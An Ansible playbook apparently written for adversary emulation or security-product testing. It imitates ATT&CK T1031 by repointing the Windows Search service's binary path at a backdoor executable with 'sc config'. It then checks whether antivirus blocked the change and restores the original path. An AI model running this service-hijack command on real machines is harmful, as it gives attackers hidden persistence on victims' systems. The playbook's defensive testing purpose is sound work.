# attack_technique: T1031
- name: T1031 - Modify Existing Service
  hosts: windows
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
  - name: Modify service path for WSearch service
    tags: always
    win_command: |
      sc config WSearch binpath= "cmd /c {{ backdoor_exe }}"
    #sc start WSearch
      
  - name: sleep for 10 seconds and continue with play to check if AV removed or Not
    tags: always
    wait_for: timeout=10
    delegate_to: localhost	   
  - name: Check if path updated ok
    tags: always
    win_command: |
      sc qc WSearch | PATH
    register: T1031
  - name: check if playbook was blocked
    tags: always
    debug: msg="Playbook Completed#T1031#blocked#win#"
    when: backdoor_exe not in T1031.stdout   
  - name: check if playbook was successfull
    tags: always
    debug: msg="Playbook Completed#T1031#passed#win#"
    when: backdoor_exe in T1031.stdout   
   
  - name: cleanup PATH      
    tags: always
    win_command: |
        sc config WSearch binPath= "C:\Windows\system32\SearchIndexer.exe /Embedding"
    when: 'backdoor_exe in T1031.stdout'   
